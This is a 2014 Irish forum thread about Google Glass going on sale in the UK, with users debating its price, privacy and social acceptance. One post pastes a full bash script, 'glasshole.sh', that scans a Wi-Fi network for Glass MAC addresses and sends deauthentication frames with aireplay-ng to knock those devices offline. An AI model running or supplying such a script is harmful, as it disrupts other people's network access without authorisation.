Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Google Glasses On Sale Now

Options
  • 16-07-2014 10:33pm
    Registered Users Posts: 6,220 ✭✭✭

only 1000 pounds sterling on the english playstore:eek:

anyone brave or rich enough to order:pac:

Comments

• Closed Accounts Posts: 1,844 ✭✭✭Snake

emo72 wrote: »
    only 1000 pounds sterling on the english playstore:eek:

anyone brave or rich enough to order:pac:

I'll do it for 2000 pounds.

Or a link

• Registered Users Posts: 18,908 ✭✭✭✭Mimikyu

This post has been deleted.

• Registered Users Posts: 6,220 ✭✭✭emo72

i dont know how i missed them up till now. i check into the english play store every second day looking to see if there is any deals on nexus products. i wonder when i will see my first set in "the wild"?

• Registered Users Posts: 6,984 ✭✭✭Venom

Way to high a price point imho.

• Closed Accounts Posts: 5,734 ✭✭✭J_E

Wouldn't want it if you gave me £1000.

• Advertisement
  • Registered Users Posts: 6,463 ✭✭✭Oafley Jones

This post has been deleted.

The whole "explorers" thing really doesn't help with that glassholes image.

• Registered Users Posts: 4,751 ✭✭✭Ste-

When I saw the thread title I thought they were available in Ireland.
    Not that I could afford them mind.

• Registered Users Posts: 9,605 ✭✭✭gctest50

#!/bin/bash
    #
    # GLASSHOLE.SH
    #
    # Find and kick Google Glass devices from your local wireless network. Requires
    # 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host. Put on a BeagleBone
    # black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
    # and wear it, hide it in your workplace or your exhibition.
    #
    # Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows:
    #
    # sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
    #
    # Thanks to Jens Killus for new rev Glass MAC addr and extglob hint (phew).

shopt -s nocasematch # Set shell to ignore case
    shopt -s extglob # For non-interactive shell.

NIC=$1 # Your wireless NIC
    BSSID=$2 # Network BSSID (exhibition, workplace, park)
    MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
    GGMAC='@(F8:8F:CA:24*|F8:8F:CA:25*)' # Match against old and new Glass.
    POLL=30 # Check every 30 seconds

airmon-ng stop mon0 # Pull down any lingering monitor devices
    airmon-ng start $NIC # Start a monitor device

echo '
    ___ _ __ __ __ __ __
    / _ \___ ___ ( ) /_ / / ___ ___ _ ___ _/ /__ ____ ___ / / ___ / /__
    / // / _ \/ _ \|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_)
    /____/\___/_//_/ \__/ /_.__/\__/ \_,_/ \_, /_/\_,_/___/___/_//_/\___/_/\__/
    /___/
    '

while true;
    do
    for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
    '(:xdigit:{1,2}:){5}:xdigit:{1,2}')
    do
    if $TARGET == $GGMAC
    then
    # Audio alert
    beep -f 1000 -l 500 -n 200 -r 2
    echo "Glasshole discovered: "$TARGET
    echo "De-authing..."
    aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
    else
    echo $TARGET": is not a Google Glass. Leaving alone.."
    fi
    done
    echo "None found this round."
    sleep $POLL
    done
    airmon-ng stop mon0

• Registered Users Posts: 18,272 ✭✭✭✭Atomic Pineapple

The whole "explorers" thing really doesn't help with that glassholes image.

Google are using it as a way to get early adopters using the device. When the price drops and the product becomes mainstream I'd imagine they'll drop that. At the minute they are targeting exactly who they need using the product.

And at least the product becoming available in the UK is a step forward. The possibilities with a device like Glass are going to be incredible.

• Moderators, Society & Culture Moderators Posts: 9,674 Mod ✭✭✭✭Manach

Whilst an exciting technology, there would be a number of social-legal issues to overcome. Whilst,AFAIK, facial recognition and recording features have some restrictions on them, it still might produce some pushback from people concerned about privacy issues.

• Advertisement

The thoughts of Dublin being infested with people wearing Google Glass... :(

Cydoniac wrote: »
    The thoughts of Dublin being infested with people wearing Google Glass... :(

Because...?

Because...?
    Looking like a moron, privacy concerns, people just going further into a 'can't put down phone' society. No doubt down the line there will be complaints of eye strain from wearing it too much, driving with it causing accidents. Culturally and socially it's too much of a distraction... It's an idea that will never work on a large scale. I honestly hope it doesn't pick up on a large scale like that and I doubt it will.

• Banned (with Prison Access) Posts: 890 ✭✭✭CrinkElite

It's the equivalent of walking around with your camera phone held up in everyone's face.

It's socially unacceptable in my opinion.

I personally will refuse to engage with anyone who wears them but I think there needs to be laws governing this stuff.

I wouldn't feel sorry for any users who end up with them shoved up their arse hole.

• Closed Accounts Posts: 1,837 ✭✭✭same ol sh1te

Hmm, people are outraged by this form factor when there's smartphones around us already. Google Glass will be the least of their worries, there'll be drones everywhere before long

Hmm, people are outraged by this form factor when there's smartphones around us already. Google Glass will be the least of their worries, there'll be drones everywhere before long

People just don't like new stuff :D

• Registered Users Posts: 20,830 ✭✭✭✭Taltos

The Daily Show did a great piece on this where they interviewed some early adopters.
    To be honest even if you were on the fence or leaning towards them before after listening to them and the interviewer (all tongue firmly in cheek) you would stay well away.

Personally I wouldn't be seen dead, give me VR for gaming at home or a tablet - but this is just a step too far and I would put them in the same bucket as the Sinclair C5 or similar.

• Banned (with Prison Access) Posts: 890 ✭✭✭CrinkElite

Smartphones are grand but I wouldn't tolerate someone holding it up to my face while interacting with me in a shop or bar.
    I suspect most people would agree with me there.

• Closed Accounts Posts: 1,837 ✭✭✭same ol sh1te

They have so many practical uses GPS etc they'll make their way to being norm before long despite the resistance

CrinkElite wrote: »
    Smartphones are grand but I wouldn't tolerate someone holding it up to my face while interacting with me in a shop or bar.
    I suspect most people would agree with me there.

I agree with this, I wouldn't feel comfortable wearing them day to day or want to be shoving a camera in someone's face who would be uncomfortable but they have incredible use cases, for example I would wear them if I was going for a cycle, going for a walk somewhere on holidays, for voice automation of a house, at a festival, at my desk in work there are various things it could be used to link to.

If it's not Glass something else will be doing the exact same thing down the line eventually and will probably be so integrated you won't even know someone is wearing one.

• Advertisement
  • Registered Users Posts: 9,605 ✭✭✭gctest50

If it's not Glass something else will be doing the exact same thing down the line eventually and will probably be so integrated you won't even know someone is wearing one.

cool use of that sorta tech

• Registered Users Posts: 17,885 ✭✭✭✭Thargor

Wouldn't pay a grand but I like watching them develop and would love to have a lightweight version for hiking and cycling someday or just general browsing. the version I buy will be fully integrated into the lens though not requiring you to look up to the right like that. Cannot understand the smug hostility to them from people who probably never checked the permissions on their apps in their lives that probably have their own smartphones sending all their metadata God knows where. Some people just seem really hostile to them in a way you see with cyclists and E-cigarettes.

• Banned (with Prison Access) Posts: 5,575 ✭✭✭AlanS181824

Obviously don't have £1,000 lying around or any £ Sterling actually....

Damn you ROI!

Do these things light up when they're recording a video?

The idea of someone walking up to me and record our every interaction is kinda creepy but cool nonetheless.

• Registered Users Posts: 4,009 ✭✭✭eamonnq

https://www.youtube.com/watch?v=ygIFZgoeBbw

They could just use something like this.

I would love a pair of Google glass(es), not sure what I would use them for and I would be unlikely to get much use out of them!!

eamonnq wrote: »

I would love a pair of Google glass(es), not sure what I would use them for and I would be unlikely to get much use out of them!!

I said the same thing about tablets before I got one...

• Registered Users Posts: 17,719 ✭✭✭✭Mantis Toboggan

These glasses will be 200 euro within 12 months.

Free Palestine 🇵🇸

• Registered Users Posts: 2,320 ✭✭✭Chet T16

It wasn't too long ago that there was uproar that people were now able to bring cameras into shared changing rooms with the introduction of camera phones, I see no reason glass type devices won't be accepted in the future.

Advertisement